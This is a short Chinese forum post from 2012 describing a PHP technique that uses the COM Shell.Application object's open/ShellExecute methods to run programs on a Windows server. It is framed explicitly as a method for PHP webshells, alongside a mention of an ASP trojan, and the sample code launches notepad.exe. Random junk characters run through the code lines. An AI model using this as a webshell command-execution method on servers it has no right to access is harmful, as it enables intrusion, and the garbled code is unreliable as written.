关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。
3 f9 f/ r% G/ }+ `) Y9 K9 f6 E6 p* v+ R* J
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法
, N7 t/ f5 X% L9 e* }
0 j% I; c3 s" H<?php
& W% @( n, A- L" P" {$wsh = new COM('Shell.Application') or die("Shell.Application");
& z# Q D1 D# ^ M6 T3 v $exec = $wsh->open("c:\\windows\\system32\\notepad.exe");, C& S4 H& K/ k$ `3 O% j; r0 G
//没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。
- U3 H' D# X- v ??>
( [' H& o! x0 j( R L8 I. w* _2 }2 C4 Q8 R. \5 Z. ~( ~9 b7 X
xp+APMServ5.2.0测试通过。% w) \$ j! B' y5 i3 I1 H
|
发表于 2012-9-15 14:29:01
收藏
支持
反对